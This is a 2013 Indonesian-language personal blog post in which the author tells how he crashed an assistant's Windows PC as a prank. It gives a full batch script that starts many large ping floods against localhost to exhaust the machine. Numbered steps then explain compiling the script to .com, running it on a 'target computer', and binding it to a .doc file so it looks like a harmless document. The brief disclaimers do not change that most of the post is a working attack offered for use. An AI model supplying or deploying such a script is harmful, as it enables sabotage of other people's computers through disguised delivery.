Pages

Saturday, October 26, 2013

CRASHING WINDOWS

Pagi ini gue duduk sendirian diruangan kerja... (--ditemenin setan kali yah...) Asistenku belum juga ada yang datang...(biasanya sih ban motornya gembos... atau macet... atau apalah.....) ditemani  flu, migran dan batuk aku coba menulis sesuatu yang sangat berbahaya... sekali lagi... tidak mempergunakan apa yang sampaikan untuk kegiatan destruktif... cukup menjadi bahan tambahan informasi dan proses pembelajaran elo semuanya...
Baru aja gue nyoba melakukan flooding ke system windows di komputer yang biasa dipake 'Made'. Tau 'Made' ga...?? Made itu asisten gue yang tinggi, cukring, lucu n jjjeeelllxxxxxxx... awalnya sih gue iseng... karena gue pikir karena RAM yang dipakenya gede banget sampe 2 Gb.... hhhmmm... enak juga nih komputer buat sasaran....
Minum teh manies dulu aaahhhh..... srrruuuppuuutttttt..... nah, gue langsung inget dengan perintah 'ping'... percaya 'ga kalo perintah ping itu bisa buat iseng2 bin jahil..... gimana caranya :
1. Persiapkan sebuah file : *.bat, dengan isi sbb : 


echo Windows NT/XP/2K/2K3 Localhost Flooding
echo Script ini menghasilkan tindakan destruktif, jadi jangan menjalankan script ini
echo di lingkungan Sekolah, Kampus, Institusi dan Organisasi penting.
echo lirva32 tidak bertanggung jawab atas semua tindakan.......
echo ----------------------------------------------------------------------------------------
echo.
echo Mengaktifkan Web Broser.... tunggu...
start /high http://www.echo.or.id/
echo Jika situs http://www.echo.or.id sudah aktif.. silahkan tekan sembarang tombol....
pause
cls
start /high /min taskmgr.exe
for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 100000 localhost
cls
echo ----------------------------------------------------------------------------------------
echo Sorry... Ur Windows crashed.......

2. Simpan file tersebut.. terserah namanya apa saja....
3. Google : bat2com, sebuah compiler merubah *.bat menjadi *.com
4. Lakukan pengcompile-an *.bat ke *.com (ga usah di compile sih gpp....)
5. Jalankan file tersebut di komputer target..... mau aman ya coba dibinding pake aplikasi pembinding... lakukan pembindingan dengan file *.doc jadi terkesan file yang kamu buat menyerupai *.doc.

No comments:

Post a Comment